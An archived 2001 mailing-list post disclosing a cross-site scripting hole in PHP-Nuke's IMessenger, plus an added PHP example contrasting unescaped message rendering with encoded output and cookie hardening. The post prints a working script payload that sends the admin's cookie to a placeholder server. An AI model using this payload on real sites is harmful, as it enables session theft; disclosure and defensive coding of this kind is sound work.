Vulnerability Development mailing list archives
Security hole in IMessenger ( PHP-Nuke )
From: frog frog <leseulfrog () hotmail com>
Date: 15 Dec 2001 13:45:29 -0000
There is a big hole in IMessenger (im.php). It accepts JavaScript... if I send

<*s*cript>window.location.href='http://www. [SERVER].com/im.php?username_to= [MY_NICK] &subject='+ document.cookie +'&message=message&action=send' ;</script>

(without '*') to the admin, he sends his cookie.

PHPNuke has been alerted. There's a tut (French) here: http://balteam.multimania.com/Tuts/imhole.txt

frog-m@n
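
Added example, not part of the original post and not PHP-Nuke's own code: the message-rendering pattern that produces this kind of hole, beside an output-encoded version, with an HttpOnly session cookie and a POST-only check for the send action as defence in depth. All function names and the $msg layout are hypothetical; the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Hypothetical names throughout; this is an illustration, not im.php.

// Vulnerable pattern: stored message fields are written into the page as-is,
// so markup in a subject or body runs in the reader's browser session.
function render_message_unsafe(array $msg): string
{
    return "<h3>{$msg['subject']}</h3>\n<p>{$msg['message']}</p>";
}

// Hardened pattern: encode every user-controlled field at output time.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_message_safe(array $msg): string
{
    return '<h3>' . h($msg['subject']) . "</h3>\n<p>"
         . nl2br(h($msg['message'])) . '</p>';
}

// Defence in depth for the cookie itself: an HttpOnly cookie is not
// exposed through document.cookie, so script cannot read it.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Sending a message changes state, so a bare GET URL with action=send
// should not be enough to deliver one in the logged-in user's name.
function is_send_allowed(string $method, string $action): bool
{
    return $action !== 'send' || $method === 'POST';
}

// Constructed sample input with a harmless marker payload.
$msg = ['subject' => 'hello', 'message' => '<script>alert(1)</script>'];
echo render_message_unsafe($msg), "\n"; // tag reaches the browser intact
echo render_message_safe($msg), "\n";   // tag is encoded and shown as text
```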